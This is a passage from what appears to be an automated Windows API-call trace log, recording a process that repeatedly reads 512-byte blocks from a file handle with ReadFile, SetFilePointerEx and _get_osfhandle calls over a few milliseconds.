dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, 
lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, 
lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 
[0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, 
lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, 
